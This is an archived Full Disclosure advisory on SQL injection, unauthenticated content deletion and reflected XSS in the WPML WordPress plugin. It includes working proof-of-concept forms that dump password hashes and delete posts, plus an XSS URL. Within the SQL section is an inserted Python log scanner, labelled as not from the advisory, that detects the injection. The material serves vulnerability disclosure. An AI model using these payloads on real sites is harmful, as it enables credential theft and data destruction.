Message-ID: <CAOm4KJUGAA7ydAr2AjCbkzea_n_wqc=iM1f651sVtXbLC56pVQ@mail.gmail.com>
Date: Thu, 12 Mar 2015 20:38:31 +0200
From: Jouko Pynnonen <jouko@....fi>
To: fulldisclosure@...lists.org
Subject: [FD] WPML WordPress plug-in SQL injection etc.

*OVERVIEW*

WPML is the industry standard for creating multi-lingual WordPress sites.
Three vulnerabilities were found in the plug-in. The most serious of them,
an SQL injection problem, allows anyone to read the contents of the
WordPress database, including user details and password hashes, without
authentication.

System administrators should update to version 3.1.9.1 released earlier
this week to resolve the issues.



*DETAILS*

*1. SQL injection*
When WPML processed an HTTP POST request containing the parameter
”action=wp-link-ajax”, the current language was determined by parsing the
HTTP referer. The parsed language code was neither checked for validity nor
SQL-escaped. The user doesn’t need to be logged in.

By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary tables
and retrieve their results. In addition to the standard WordPress database
and tables, the attacker may query all other databases and tables
accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";if (document.location.search.length < 2)
        document.location.search="lang=xx' UNION "+union+" -- -- ";</script>
<form method=POST
action="https://YOUR.WORDPRESS.BLOG/comments/feed"><input type=hidden
name=action value="wp-link-ajax"><input type=submit></form>

The results of the SQL query are returned, XML-formatted, in the comments
feed.
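As an added defender-side example, not code from the advisory or from WPML: the allowlist check that a language code parsed from the referer should pass, applied in a pass over constructed Apache combined-format log lines so that POSTs whose Referer carries a non-conforming lang value are flagged for review. The language-code pattern, the log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shape of a WPML-style language code ("en", "pt-br", "zh-hans");
# this allowlist pattern is constructed here, not taken from the plugin.
LANG_CODE_RE = re.compile(r"^[a-z]{2,3}(-[a-z]{2,4})?$")

# Apache "combined" format: request line, status, size, Referer, User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def lang_from_referer(referer):
    """Return the decoded 'lang' query value of a Referer URL, or None."""
    values = parse_qs(urlsplit(referer).query, keep_blank_values=True).get("lang")
    return values[0] if values else None

def is_valid_lang(code):
    """The validity check the vulnerable path lacked: accept the allowlist shape
    only, so quotes, spaces and SQL keywords are rejected before any query."""
    return code is not None and LANG_CODE_RE.match(code) is not None

def suspicious_requests(lines):
    """Return (ip, path, lang) for POSTs whose Referer lang fails validation."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        lang = lang_from_referer(m.group("referer"))
        if lang is not None and not is_valid_lang(lang):
            hits.append((m.group("ip"), m.group("path"), lang))
    return hits

# Constructed sample log lines; the first mirrors the shape of the PoC above.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2015:20:38:31 +0200] "POST /comments/feed HTTP/1.1" 200 5120 '
    '"https://blog.example/?lang=xx%27%20UNION%20select%20user_login,user_pass'
    '%20from%20wp_users%20--%20--" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2015:20:40:02 +0200] "POST /comments/feed HTTP/1.1" 200 812 '
    '"https://blog.example/?lang=fi" "Mozilla/5.0"',
    '198.51.100.8 - - [12/Mar/2015:20:41:10 +0200] "GET /?lang=de HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, lang in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} POST {path} referer lang={lang!r}")
```

The same allowlist check, placed before the value reaches any query and combined with a parameterised query, is the server-side fix; escaping alone is the weaker option.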


*2. Page/post/menu deletion*

WPML contains a ”menu sync” function which helps site administrators to
keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.
Example:

<form method=POST
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"><input
type=hidden name="action" value="icl_msync_confirm"><input type=text
name="sync" size=50 value="del[x][y][12345]=z"><input
type=submit></form>

Submitting the above form would delete the row with the ID 12345 in the
wp_posts table. Several items can be deleted with the same request.



*3. Reflected XSS*

The ”reminder popup” code in WPML, intended for administrators, didn’t check
login status or a nonce. An attacker can direct target users to a URL
like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f


to execute JavaScript in their browser. This example bypasses the Chrome
XSS Auditor. In the case of WordPress, XSS triggered by an administrator
can lead to server-side compromise via the plugin and theme editors.



*CREDITS*

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.

The vendor was notified on March 02, 2015 and the patch was released on
March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website,
http://klikki.fi.


-- 
Jouko Pynnönen <jouko@....fi>
Klikki Oy - http://klikki.fi

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/